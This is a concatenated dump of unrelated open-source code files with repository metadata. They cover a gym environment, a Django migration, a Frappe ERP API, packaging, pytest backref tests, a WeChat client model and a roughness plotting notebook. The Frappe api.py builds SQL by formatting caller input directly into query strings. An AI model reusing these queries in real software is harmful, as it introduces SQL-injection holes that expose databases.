d79ec329aaf068bcca9a05de11b446cd847d02ae | 1,354 | py | Python | rlkit/envs/simple/point.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | 1 | 2020-10-23T14:40:09.000Z | 2020-10-23T14:40:09.000Z | rlkit/envs/simple/point.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | null | null | null | rlkit/envs/simple/point.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | 1 | 2021-05-27T20:38:45.000Z | 2021-05-27T20:38:45.000Z | import os
from gym import spaces
import numpy as np
import gym
class Point(gym.Env):
"""Superclass for all MuJoCo environments.
"""
@property
@property
| 26.54902 | 64 | 0.565731 | import os
from gym import spaces
import numpy as np
import gym
class Point(gym.Env):
"""Superclass for all MuJoCo environments.
"""
def __init__(self, n=2, action_scale=0.2, fixed_goal=None):
self.fixed_goal = fixed_goal
self.n = n
self.action_scale = action_scale
self.goal = np.zeros((n,))
self.state = np.zeros((n,))
@property
def action_space(self):
return spaces.Box(
low=-1*np.ones((self.n,)),
high=1*np.ones((self.n,))
)
@property
def observation_space(self):
return spaces.Box(
low=-5*np.ones((2 * self.n,)),
high=5*np.ones((2 * self.n,))
)
def reset(self):
self.state = np.zeros((self.n,))
if self.fixed_goal is None:
self.goal = np.random.uniform(-5, 5, size=(self.n,))
else:
self.goal = np.array(self.fixed_goal)
return self._get_obs()
def step(self, action):
action = np.clip(action, -1, 1) * self.action_scale
new_state = self.state + action
new_state = np.clip(new_state, -5, 5)
self.state = new_state
reward = -np.linalg.norm(new_state - self.goal)
return self._get_obs(), reward, False, {}
def _get_obs(self):
return np.concatenate([self.state, self.goal])
| 1,022 | 0 | 160 |
bffaddba3f2b361de8e78c90bf1fe7fb63f04d5d | 466 | py | Python | internos/users/migrations/0005_user_skype_account.py | UNICEFLebanonInnovation/Staging-Neuro | aac1e4f335ff4ec32041f989a9c22f8581a4961a | [
"MIT"
] | 1 | 2020-12-12T07:41:11.000Z | 2020-12-12T07:41:11.000Z | internos/users/migrations/0005_user_skype_account.py | UNICEFLebanonInnovation/Staging-Neuro | aac1e4f335ff4ec32041f989a9c22f8581a4961a | [
"MIT"
] | 9 | 2019-12-31T09:30:23.000Z | 2022-01-13T00:49:47.000Z | internos/users/migrations/0005_user_skype_account.py | UNICEFLebanonInnovation/Staging-Neuro | aac1e4f335ff4ec32041f989a9c22f8581a4961a | [
"MIT"
] | 1 | 2020-02-03T13:12:55.000Z | 2020-02-03T13:12:55.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2019-01-31 18:13
from __future__ import unicode_literals
from django.db import migrations, models
| 22.190476 | 63 | 0.622318 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2019-01-31 18:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0004_section_powerbi_url'),
]
operations = [
migrations.AddField(
model_name='user',
name='skype_account',
field=models.CharField(blank=True, max_length=255),
),
]
| 0 | 287 | 23 |
6c16d8d444a19e1eefc34f7c842e092d007d5c3d | 4,102 | py | Python | tools_box/controllers/api.py | maisonarmani/Tools_Box | 4f8cc3a0deac1be50a3ac80758a10608faf58454 | [
"MIT"
] | null | null | null | tools_box/controllers/api.py | maisonarmani/Tools_Box | 4f8cc3a0deac1be50a3ac80758a10608faf58454 | [
"MIT"
] | null | null | null | tools_box/controllers/api.py | maisonarmani/Tools_Box | 4f8cc3a0deac1be50a3ac80758a10608faf58454 | [
"MIT"
] | 1 | 2022-01-30T12:15:41.000Z | 2022-01-30T12:15:41.000Z | # Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.utils import get_fetch_values
from frappe.model.mapper import get_mapped_doc
from frappe.utils import cstr, flt, getdate, comma_and, cint, nowdate, add_days
import datetime
from frappe import sendmail
@frappe.whitelist()
@frappe.whitelist()
@frappe.whitelist()
@frappe.whitelist()
def resolve_work_order(docname):
# update without checking permissions
""" Called from client side on Stop/Unstop event"""
status = 'Resolved'
if not frappe.has_permission("Work Order", "write"):
frappe.throw(_("Not permitted"), frappe.PermissionError)
frappe.db.sql("update `tabWork Order` set status = 'Resolved', modified='%s',modified_by='%s' , skip_transfer=1"
" where name = '%s'" % (datetime.datetime.now(), frappe.session.user,docname))
frappe.msgprint(_("Work Order has been {0}").format(status))
return True
@frappe.whitelist()
@frappe.whitelist()
| 33.900826 | 128 | 0.663579 | # Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.utils import get_fetch_values
from frappe.model.mapper import get_mapped_doc
from frappe.utils import cstr, flt, getdate, comma_and, cint, nowdate, add_days
import datetime
from frappe import sendmail
@frappe.whitelist()
def get_active_employees(doctype, txt, searchfield, start, page_len, filters):
return _get(txt, start, page_len)
def _get(text=None, start=0, page_len=5):
return frappe.db.sql("""select DISTINCT t1.name, t1.employee_name from
tabEmployee t1 where t1.status != "left" and (t1.name LIKE '%{text}%' or t1.employee_name LIKE '%{text}%')
ORDER BY t1. employee_name limit {skip}, {limit} """.format(text=text, skip=start, limit=page_len))
@frappe.whitelist()
def get_directors(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""
SELECT u.name, concat(u.first_name, ' ', u.last_name)
FROM tabUser u, `tabHas Role` r
WHERE u.name = r.parent AND r.role = 'Directors'
AND u.enabled = 1 AND u.name LIKE %s
""", ("%" + txt + "%"))
@frappe.whitelist()
def get_approver_authorizer(emp):
# check if the user reports to any one
reports_to = frappe.db.sql(""" SELECT reports_to from `tabEmployee` WHERE name="{0}" """.format(emp), as_dict=1)[0]
if reports_to.reports_to is None:
data = [dict(approver=emp, authorizer=emp)]
else:
data = frappe.db.sql(""" SELECT IFNULL(c.reports_to, '{0}') approver, IFNULL(p.reports_to, c.reports_to) authorizer from
tabEmployee c JOIN tabEmployee p ON (c.reports_to = p.name) WHERE c.name="{0}" """.format(emp),
as_dict=1)
# first who the employee reports to
# and up the ladder
authorizer = approver = {}
for datum in data:
approver = frappe.get_value("Employee", datum.get('approver'), ["name", "user_id", "employee_name"])
authorizer = frappe.get_value("Employee", datum.get('authorizer'), ["name", "user_id", "employee_name"])
if not authorizer:
authorizer = ["", "", ""]
if not approver:
approver = ["", "", ""]
return [{
"approver": approver[0],
"authorizer": authorizer[0],
"approver_name": approver[2],
"authorizer_name": authorizer[2],
"approver_user_id": approver[1],
"authorizer_user_id": authorizer[1]
}]
@frappe.whitelist()
def resolve_work_order(docname):
# update without checking permissions
""" Called from client side on Stop/Unstop event"""
status = 'Resolved'
if not frappe.has_permission("Work Order", "write"):
frappe.throw(_("Not permitted"), frappe.PermissionError)
frappe.db.sql("update `tabWork Order` set status = 'Resolved', modified='%s',modified_by='%s' , skip_transfer=1"
" where name = '%s'" % (datetime.datetime.now(), frappe.session.user,docname))
frappe.msgprint(_("Work Order has been {0}").format(status))
return True
@frappe.whitelist()
def get_discount(customer, transation_date):
d = getdate(transation_date)
ds_status = frappe.db.sql("SELECT entitled_discount_ FROM `tabCustomer` WHERE"
" name= '{1}' AND DATE('{0}') >= discount_start AND DATE('{0}') <= discount_end".format(d,customer))
if ds_status:
return ds_status[0][0]
else:
return 0
@frappe.whitelist()
def make_authority_to_load(source_name, target_doc=None):
def set_missing_values(source, target):
target.sales_order = source.name
def update_item(source_doc, target_doc, source_parent):
pass
doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Authority to Load",
"validation": {
"docstatus": ["=", 1]
},
"field_map": {
"sales_order":"name"
},
"add_if_empty": False,
"postprocess": update_item,
"condition": lambda doc: doc.docstatus == 1
},
}, target_doc, set_missing_values)
return doc
| 2,838 | 0 | 133 |
2ad2349ebd91d0f237f9dcd36a17172e08a26534 | 1,139 | py | Python | setup.py | Doma1204/HC-05-HC-06_Bluetooth_Tool | 61636dd6e22ed0ed049b44727e6a63c0b4454f48 | [
"MIT"
] | 2 | 2020-10-09T10:18:16.000Z | 2021-01-16T18:40:47.000Z | setup.py | Doma1204/HC-05-HC-06_Bluetooth_Tool | 61636dd6e22ed0ed049b44727e6a63c0b4454f48 | [
"MIT"
] | null | null | null | setup.py | Doma1204/HC-05-HC-06_Bluetooth_Tool | 61636dd6e22ed0ed049b44727e6a63c0b4454f48 | [
"MIT"
] | 6 | 2020-03-28T14:48:53.000Z | 2021-03-25T05:57:29.000Z | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="HC-05-ConfigTool",
version="0.1.1",
author="Joseph Lam",
author_email="mhlamaf@connect.ust.hk",
description="A terminal tool for configuring HC-05 with AT mode.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Doma1204/HC-05_Bluetooth_Tool",
packages=setuptools.find_packages(),
license="MIT",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Topic :: Utilities",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7"
],
python_requires='>=3',
keywords="bluetooth hc-05",
install_requires=["pyserial"]
)
| 33.5 | 70 | 0.628622 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="HC-05-ConfigTool",
version="0.1.1",
author="Joseph Lam",
author_email="mhlamaf@connect.ust.hk",
description="A terminal tool for configuring HC-05 with AT mode.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Doma1204/HC-05_Bluetooth_Tool",
packages=setuptools.find_packages(),
license="MIT",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Topic :: Utilities",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7"
],
python_requires='>=3',
keywords="bluetooth hc-05",
install_requires=["pyserial"]
)
| 0 | 0 | 0 |
b7bca4e34d657d3cc71070163dddac668fc8226b | 5,583 | py | Python | tests/open_alchemy/schemas/helpers/test_backref.py | rgreinho/OpenAlchemy | 23202bdecb94763d09b6d9e84eb9b29506c811ae | [
"Apache-2.0"
] | null | null | null | tests/open_alchemy/schemas/helpers/test_backref.py | rgreinho/OpenAlchemy | 23202bdecb94763d09b6d9e84eb9b29506c811ae | [
"Apache-2.0"
] | 53 | 2020-12-30T15:32:55.000Z | 2022-03-31T10:07:00.000Z | tests/open_alchemy/schemas/helpers/test_backref.py | rgreinho/OpenAlchemy | 23202bdecb94763d09b6d9e84eb9b29506c811ae | [
"Apache-2.0"
] | null | null | null | """Tests for backref schemas processing."""
import pytest
from open_alchemy.schemas import helpers
@pytest.mark.parametrize(
"schema, schemas, expected_backref",
[
pytest.param({}, {}, None, id="no items, allOf nor $ref"),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {}},
None,
id="$ref no backref",
),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="$ref backref",
),
pytest.param({"allOf": []}, {}, None, id="allOf empty"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf single $ref",
),
pytest.param(
{"allOf": [{"x-backref": "schema"}]},
{},
"schema",
id="allOf single x-backref",
),
pytest.param({"allOf": [{}]}, {}, None, id="allOf single no backref"),
pytest.param({"allOf": [{}, {}]}, {}, None, id="allOf multiple no backref"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}, {}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf multiple first",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {}},
"schema",
id="allOf multiple second",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf multiple all",
),
pytest.param(
{"items": {"$ref": "#/components/schemas/RefSchema"}},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="items $ref backref",
),
pytest.param(
{"allOf": [{"items": {"$ref": "#/components/schemas/RefSchema"}}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="items allOf $ref backref",
),
],
)
@pytest.mark.schemas
def test_get(schema, schemas, expected_backref):
"""
GIVEN schema, schemas and expected backref
WHEN get is called with the schema and schemas
THEN the expected backref is returned.
"""
returned_backref = helpers.backref.get(schemas, schema)
assert returned_backref == expected_backref
@pytest.mark.parametrize(
"schema, schemas, expected_result",
[
pytest.param({}, {}, False, id="no items, allOf nor $ref"),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {}},
False,
id="$ref no backref",
),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {"x-backref": "schema"}},
True,
id="$ref backref",
),
pytest.param({"allOf": []}, {}, False, id="allOf empty"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}]},
{"RefSchema": {"x-backref": "schema"}},
True,
id="allOf single $ref",
),
pytest.param(
{"allOf": [{"x-backref": "schema"}]},
{},
True,
id="allOf single x-backref",
),
pytest.param({"allOf": [{}]}, {}, False, id="allOf single no backref"),
pytest.param({"allOf": [{}, {}]}, {}, False, id="allOf multiple no backref"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}, {}]},
{"RefSchema": {"x-backref": "schema"}},
True,
id="allOf multiple first",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {}},
True,
id="allOf multiple second",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {"x-backref": "schema"}},
True,
id="allOf multiple all",
),
pytest.param(
{"items": {"$ref": "#/components/schemas/RefSchema"}},
{"RefSchema": {"x-backref": "schema"}},
True,
id="items $ref backref",
),
pytest.param(
{"allOf": [{"items": {"$ref": "#/components/schemas/RefSchema"}}]},
{"RefSchema": {"x-backref": "schema"}},
True,
id="items allOf $ref backref",
),
],
)
@pytest.mark.schemas
def test_defined(schema, schemas, expected_result):
"""
GIVEN schema, schemas and expected result
WHEN defined is called with the schema and schemas
THEN the expected result is returned.
"""
returned_result = helpers.backref.defined(schemas, schema)
assert returned_result == expected_result
| 31.721591 | 85 | 0.454594 | """Tests for backref schemas processing."""
import pytest
from open_alchemy.schemas import helpers
@pytest.mark.parametrize(
"schema, schemas, expected_backref",
[
pytest.param({}, {}, None, id="no items, allOf nor $ref"),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {}},
None,
id="$ref no backref",
),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="$ref backref",
),
pytest.param({"allOf": []}, {}, None, id="allOf empty"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf single $ref",
),
pytest.param(
{"allOf": [{"x-backref": "schema"}]},
{},
"schema",
id="allOf single x-backref",
),
pytest.param({"allOf": [{}]}, {}, None, id="allOf single no backref"),
pytest.param({"allOf": [{}, {}]}, {}, None, id="allOf multiple no backref"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}, {}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf multiple first",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {}},
"schema",
id="allOf multiple second",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="allOf multiple all",
),
pytest.param(
{"items": {"$ref": "#/components/schemas/RefSchema"}},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="items $ref backref",
),
pytest.param(
{"allOf": [{"items": {"$ref": "#/components/schemas/RefSchema"}}]},
{"RefSchema": {"x-backref": "schema"}},
"schema",
id="items allOf $ref backref",
),
],
)
@pytest.mark.schemas
def test_get(schema, schemas, expected_backref):
"""
GIVEN schema, schemas and expected backref
WHEN get is called with the schema and schemas
THEN the expected backref is returned.
"""
returned_backref = helpers.backref.get(schemas, schema)
assert returned_backref == expected_backref
@pytest.mark.parametrize(
"schema, schemas, expected_result",
[
pytest.param({}, {}, False, id="no items, allOf nor $ref"),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {}},
False,
id="$ref no backref",
),
pytest.param(
{"$ref": "#/components/schemas/RefSchema"},
{"RefSchema": {"x-backref": "schema"}},
True,
id="$ref backref",
),
pytest.param({"allOf": []}, {}, False, id="allOf empty"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}]},
{"RefSchema": {"x-backref": "schema"}},
True,
id="allOf single $ref",
),
pytest.param(
{"allOf": [{"x-backref": "schema"}]},
{},
True,
id="allOf single x-backref",
),
pytest.param({"allOf": [{}]}, {}, False, id="allOf single no backref"),
pytest.param({"allOf": [{}, {}]}, {}, False, id="allOf multiple no backref"),
pytest.param(
{"allOf": [{"$ref": "#/components/schemas/RefSchema"}, {}]},
{"RefSchema": {"x-backref": "schema"}},
True,
id="allOf multiple first",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {}},
True,
id="allOf multiple second",
),
pytest.param(
{
"allOf": [
{"$ref": "#/components/schemas/RefSchema"},
{"x-backref": "schema"},
]
},
{"RefSchema": {"x-backref": "schema"}},
True,
id="allOf multiple all",
),
pytest.param(
{"items": {"$ref": "#/components/schemas/RefSchema"}},
{"RefSchema": {"x-backref": "schema"}},
True,
id="items $ref backref",
),
pytest.param(
{"allOf": [{"items": {"$ref": "#/components/schemas/RefSchema"}}]},
{"RefSchema": {"x-backref": "schema"}},
True,
id="items allOf $ref backref",
),
],
)
@pytest.mark.schemas
def test_defined(schema, schemas, expected_result):
"""
GIVEN schema, schemas and expected result
WHEN defined is called with the schema and schemas
THEN the expected result is returned.
"""
returned_result = helpers.backref.defined(schemas, schema)
assert returned_result == expected_result
| 0 | 0 | 0 |
b2231af1d072a01b4fde2eaed8a95b60c78314e2 | 3,637 | py | Python | src/wechat_client/models.py | redhead520/django-blog | 1ae4694a9e063f79b96b77bdb6f153aceea259c8 | [
"MIT"
] | null | null | null | src/wechat_client/models.py | redhead520/django-blog | 1ae4694a9e063f79b96b77bdb6f153aceea259c8 | [
"MIT"
] | null | null | null | src/wechat_client/models.py | redhead520/django-blog | 1ae4694a9e063f79b96b77bdb6f153aceea259c8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from wechat_client import weclient
import os
| 37.885417 | 137 | 0.590047 | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from wechat_client import weclient
import os
class WeChat(models.Model):
user = models.ForeignKey(User, verbose_name='登入账号', on_delete=models.CASCADE, blank=False)
wx_account = models.CharField('微信账号', blank=False, max_length=50)
# account_path = models.FilePathField(path='./wechat_client/static/image/account', verbose_name='账号图片地址', max_length=100, blank=True)
online = models.BooleanField('是否已登入', default=False, blank=False)
active = models.BooleanField('是否启用', default=True, blank=False)
def __str__(self):
return '{}[{}]'.format(self.user.username, self.wx_account)
class Meta:
ordering = ['user', 'wx_account']
verbose_name = "微信账号"
verbose_name_plural = verbose_name
get_latest_by = 'id'
@classmethod
def get_online_wx(cls, user_id):
online_wx = cls.objects.filter(user=user_id, online=True).first()
if online_wx:
if weclient.check_account(online_wx.wx_account):
return online_wx, 'success'
else:
online_wx.online = False
online_wx.save()
wxs = WeChat.objects.filter(user=user_id)
for outline_wx in wxs:
if weclient.check_account(outline_wx.wx_account):
outline_wx.online = True
outline_wx.save()
return outline_wx, 'success'
return None, '您的微信账号尚未登入!' if wxs else '您尚未有用账户,请联系工作人员!'
@classmethod
def get_qr_code(cls, user_id):
url = ''
online_wx = cls.objects.filter(user=user_id, online=True).first()
if online_wx and cls.check_online_wx(user_id):
return None, '你的微信已经登入了'
else:
outline_wx = cls.objects.filter(user=user_id, online=False).first()
if outline_wx and cls.check_online_wx(user_id):
return None, '你的微信已经登入了'
data = weclient.login()
if data:
url = '/static/image/temp/' + os.path.split(data['url'])[1]
data.update({'url': url})
return data, 'success'
return url, '服务器无法登入微信,请联系管理员!'
def send_msg(self, friends, content, msg_type='text'):
for friend in friends:
weclient.send_msg(self.wx_account, friend, content, msg_type)
return True
@classmethod
def check_login(cls, user_id, hwnd, wait=False):
is_login = weclient.check_login(hwnd, wait=wait)
if is_login:
cls.check_online_wx(user_id)
return True
return False
@classmethod
def check_online_wx(cls, user_id=None):
result = None
account_mapping = weclient.get_account_list()
for on in cls.objects.filter(online=True):
if on.wx_account not in account_mapping:
on.online = False
on.save()
else:
account_mapping.pop(on.wx_account)
if on.user.id == user_id:
result = on
for account, kwnd in account_mapping.items():
wx_account = cls.objects.filter(wx_account=account).first()
if not wx_account:
weclient.login()
else:
if not wx_account.online:
wx_account.online = True
# wx_account.account_path = '{}.jpg'.format(account)
wx_account.save()
if wx_account.user.id == user_id:
result = wx_account
return result
| 2,750 | 892 | 23 |
4cee8f58f095df607156ffd69e401c13cb99b707 | 3,550 | py | Python | examples/explore_lookup.py | NAU-PIXEL/roughness | dfaa3d2bc448a2ca19cb2d6001cc5dcf8ee26f82 | [
"MIT"
] | null | null | null | examples/explore_lookup.py | NAU-PIXEL/roughness | dfaa3d2bc448a2ca19cb2d6001cc5dcf8ee26f82 | [
"MIT"
] | 2 | 2021-11-18T16:26:19.000Z | 2021-11-18T16:39:08.000Z | examples/explore_lookup.py | NAU-PIXEL/roughness | dfaa3d2bc448a2ca19cb2d6001cc5dcf8ee26f82 | [
"MIT"
] | 1 | 2021-10-09T08:01:11.000Z | 2021-10-09T08:01:11.000Z | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.12.0
# kernelspec:
# display_name: 'Python 3.7.7 64-bit (''.venv'': poetry)'
# name: python3
# ---
# %% [markdown]
# # Interactive plots to explore line of sight / shadowing tables
#
# ## Setup
# %%
import matplotlib.pyplot as plt
import ipywidgets as ipyw
from ipywidgets import interact
from roughness import plotting as rp
from roughness import roughness as rn
from roughness import make_los_table as mlt
# Load lookups (losfrac, Num los facets, Num facets total)
lookup = rn.load_los_lookup(mlt.FLOOKUP)
# Get coord arrays and interactive plot sliders for rms, inc, az
rmss = lookup.rms.values
incs = lookup.inc.values
azs = lookup.az.values
slopes = lookup.theta.values
rms_slider = ipyw.IntSlider(20, min=rmss.min(), max=rmss.max(), step=1)
inc_slider = ipyw.IntSlider(30, min=incs.min(), max=incs.max(), step=1)
az_slider = ipyw.IntSlider(270, min=azs.min(), max=azs.max(), step=15)
# %% [markdown]
# ## Shadow table
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
shadow_table = rn.get_shadow_table(rms, inc, az, lookup)
clabel = "P(shadowed)"
ax = rp.plot_slope_az_table(shadow_table, True, clabel)
ax.set_title("Fraction of facets shadowed in slope / az bin")
# %% [markdown]
# ## View table
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
view_table = rn.get_view_table(rms, inc, az, lookup)
clabel = "P(visible)"
ax = rp.plot_slope_az_table(view_table, True, clabel)
ax.set_title("Fraction of facets visible in slope / az bin")
# %% [markdown]
# ## Total facets
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
total_facet_table = rn.get_los_table(rms, inc, az, lookup, "prob")
clabel = "Total facets"
ax = rp.plot_slope_az_table(total_facet_table, True, clabel)
ax.set_title("Total facet count in slope / az bin")
# %% [markdown]
# ## Line of sight facets
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
los_facet_table = rn.get_los_table(rms, inc, az, lookup, "los")
clabel = "LOS facets"
ax = rp.plot_slope_az_table(los_facet_table, True, clabel)
ax.set_title("Line of sight facet count in slope / az bin")
# %%
titles = [
"Fraction of facets shadowed in slope / az bin",
"Norm prob of visible facets in slope / az bin",
"Line of sight facet count in slope / az bin",
"Total facet count in slope / az bin",
]
clabels = [
"P(shadowed)",
"P(visible)/sum(visible)",
"N(lineofsight)",
"N(total)",
]
@interact
def plot_all_tables(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
_, axs = plt.subplots(2, 2, figsize=(12, 10))
tables = [
rn.get_shadow_table(rms, inc, az, lookup),
rn.get_view_table(rms, inc, az, lookup),
rn.get_los_table(rms, inc, az, lookup, "los"),
rn.get_los_table(rms, inc, az, lookup, "total"),
]
for i, ax in enumerate(axs.flatten()):
cmap_r = i == 0
ax = rp.plot_slope_az_table(tables[i], cmap_r, clabels[i], ax)
ax.set_title(titles[i])
# %%
| 28.4 | 71 | 0.668451 | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.12.0
# kernelspec:
# display_name: 'Python 3.7.7 64-bit (''.venv'': poetry)'
# name: python3
# ---
# %% [markdown]
# # Interactive plots to explore line of sight / shadowing tables
#
# ## Setup
# %%
import matplotlib.pyplot as plt
import ipywidgets as ipyw
from ipywidgets import interact
from roughness import plotting as rp
from roughness import roughness as rn
from roughness import make_los_table as mlt
# Load lookups (losfrac, Num los facets, Num facets total)
lookup = rn.load_los_lookup(mlt.FLOOKUP)
# Get coord arrays and interactive plot sliders for rms, inc, az
rmss = lookup.rms.values
incs = lookup.inc.values
azs = lookup.az.values
slopes = lookup.theta.values
rms_slider = ipyw.IntSlider(20, min=rmss.min(), max=rmss.max(), step=1)
inc_slider = ipyw.IntSlider(30, min=incs.min(), max=incs.max(), step=1)
az_slider = ipyw.IntSlider(270, min=azs.min(), max=azs.max(), step=15)
# %% [markdown]
# ## Shadow table
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
shadow_table = rn.get_shadow_table(rms, inc, az, lookup)
clabel = "P(shadowed)"
ax = rp.plot_slope_az_table(shadow_table, True, clabel)
ax.set_title("Fraction of facets shadowed in slope / az bin")
# %% [markdown]
# ## View table
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
view_table = rn.get_view_table(rms, inc, az, lookup)
clabel = "P(visible)"
ax = rp.plot_slope_az_table(view_table, True, clabel)
ax.set_title("Fraction of facets visible in slope / az bin")
# %% [markdown]
# ## Total facets
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
total_facet_table = rn.get_los_table(rms, inc, az, lookup, "prob")
clabel = "Total facets"
ax = rp.plot_slope_az_table(total_facet_table, True, clabel)
ax.set_title("Total facet count in slope / az bin")
# %% [markdown]
# ## Line of sight facets
# %%
@interact
def plot_shadow_table(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
los_facet_table = rn.get_los_table(rms, inc, az, lookup, "los")
clabel = "LOS facets"
ax = rp.plot_slope_az_table(los_facet_table, True, clabel)
ax.set_title("Line of sight facet count in slope / az bin")
# %%
titles = [
"Fraction of facets shadowed in slope / az bin",
"Norm prob of visible facets in slope / az bin",
"Line of sight facet count in slope / az bin",
"Total facet count in slope / az bin",
]
clabels = [
"P(shadowed)",
"P(visible)/sum(visible)",
"N(lineofsight)",
"N(total)",
]
@interact
def plot_all_tables(rms=rms_slider, inc=inc_slider, az=az_slider):
"""Plot shadowing conditions at rms, inc, az."""
_, axs = plt.subplots(2, 2, figsize=(12, 10))
tables = [
rn.get_shadow_table(rms, inc, az, lookup),
rn.get_view_table(rms, inc, az, lookup),
rn.get_los_table(rms, inc, az, lookup, "los"),
rn.get_los_table(rms, inc, az, lookup, "total"),
]
for i, ax in enumerate(axs.flatten()):
cmap_r = i == 0
ax = rp.plot_slope_az_table(tables[i], cmap_r, clabels[i], ax)
ax.set_title(titles[i])
# %%
| 0 | 0 | 0 |
48f772048b20bc547fb1799f586eaf72799e17cd | 2,262 | py | Python | src/feature-extractor/feature_extractor.py | s0umitra/Image-Captioning | 272c24bd736579ae69a7963be5fd452b5cfb9818 | [
"MIT"
] | null | null | null | src/feature-extractor/feature_extractor.py | s0umitra/Image-Captioning | 272c24bd736579ae69a7963be5fd452b5cfb9818 | [
"MIT"
] | null | null | null | src/feature-extractor/feature_extractor.py | s0umitra/Image-Captioning | 272c24bd736579ae69a7963be5fd452b5cfb9818 | [
"MIT"
] | null | null | null | import os
from pickle import dump
from time import time
from keras.applications.inception_v3 import InceptionV3
